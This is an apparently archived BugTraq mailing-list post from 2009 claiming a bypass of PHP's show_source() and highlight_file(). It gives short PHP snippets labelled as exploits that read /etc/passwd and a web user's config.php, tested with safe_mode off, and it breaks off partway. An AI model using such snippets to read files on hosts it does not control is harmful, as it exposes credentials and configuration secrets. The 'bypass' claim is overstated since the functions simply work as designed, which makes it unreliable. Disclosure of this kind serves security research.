Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass‏ Jan 04 2009 07:39PM
l1un hotmail com
Ahthoer:Super-Crystal

www.arab4services.net

safe_mode off (tested)

<?

show_source ('/etc/passwd');

?>

Example exploit:

<?

show_source ('/home/user/public_html/config.php');

?>

-----------------------------

highlight_file()

<?

highlight_file ("/etc/passwd");

?>

exploit !!!

<...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus